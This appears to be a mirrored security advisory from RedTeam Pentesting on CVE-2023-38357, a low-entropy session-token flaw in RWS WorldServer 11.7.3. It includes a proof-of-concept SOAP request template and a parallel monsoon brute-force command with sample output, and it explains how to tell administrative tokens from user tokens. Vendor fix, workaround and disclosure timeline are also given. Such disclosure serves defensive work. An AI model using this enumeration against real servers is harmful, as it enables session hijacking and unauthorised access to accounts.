扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 |
Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration Session tokens in RWS WorldServer have a low entropy and can be enumerated, leading to unauthorised access to user sessions. Details ======= Product: WorldServer Affected Versions: 11.7.3 and earlier versions Fixed Version: 11.8.0 Vulnerability Type: Session Token Enumeration Security Risk: high Vendor URL: https://www.rws.com/localization/products/additional-solutions/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001 Advisory Status: published CVE: CVE-2023-38357 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357 Introduction ============ "WorldServer offers a flexible, enterprise-class translation management system that automates translation tasks and greatly reduces the cost of supporting large volumes of local language content." (from the vendor's homepage) More Details ============ WorldServer associates user sessions with numerical tokens, which always are positive values below 2^31. The SOAP action "loginWithToken" allows for a high amount of parallel attempts to check if a token is valid. During analysis, many assigned tokens were found to be in the 7-digit range of values. An attacker is therefore able to enumerate user accounts in only a few hours. Proof of Concept ================ In the following an example "loginWithToken" request is shown: ----------------------------------------------------------------------- POST /ws/services/WSContext HTTP/1.1 Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 501 Host: www.example.com Connection: close User-Agent: agent <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org"> <soapenv:Header/> <soapenv:Body> <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <token xsi:type="xsd:string">FUZZ</token> </com:loginWithToken> </soapenv:Body> </soapenv:Envelope> ----------------------------------------------------------------------- It can be saved as file "login-soap.req" and be used as a request template for the command-line HTTP enumerator monsoon [1] to achieve many parallel requests: ----------------------------------------------------------------------- $ monsoon fuzz --threads 100 \ --template-file login-soap.req \ --range 1-2147483647 \ --hide-pattern "InvalidSessionException" \ 'https://www.example.com' Target URL: https://www.example.com/ status header body valueextract 500191560 5829099 500191556 6229259 200191 3702 7545136 500191556 9054984 [...] processed 12000000 HTTP requests in 2h38m38s 4 of 12000000 requests shown, 1225 req/s ----------------------------------------------------------------------- The --range parameter reflects the possible value range of 2^31 and for each value an HTTP request is sent to the WorldServer SOAP API where the FUZZ marker in the request template is replaced with the respective value. Also responses are hidden which contain "InvalidSessionException" as these sessions are invalid. Responses will yield a status code of 200 if an administrative session token is found. For an unprivileged user session, status code 500 is returned. Workaround ========== Lower the rate at which requests can be issued, for example with a frontend proxy. Fix === According to the vendor, upgrading to versions above 11.8.0 resolves the vulnerability. Security Risk ============= Attackers can efficiently enumerate session tokens. In a penetration test, it was possible to get access to multiple user accounts, including administrative accounts using this method in under three hours. Additionally, by using such an administrative account it seems likely to be possible to execute arbitrary code on the underlying server by customising the REST API [2]. Thus, the vulnerability poses a high risk. Timeline ======== 2023-03-27 Vulnerability identified 2023-03-30 Customer approved disclosure to vendor 2023-04-03 Requested security contact from vendor 2023-04-06 Vendor responded with security contact 2023-04-14 Advisory sent to vendor 2023-04-18 Vendor confirms vulnerability and states that it was already known and fixed in version 11.8.0. 2023-07-03 Customer confirms update to fixed version 2023-07-05 CVE ID requested 2023-07-15 CVE ID assigned 2023-07-19 Advisory released References ========== [1] https://github.com/RedTeamPentesting/monsoon [2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen |
体验盒子
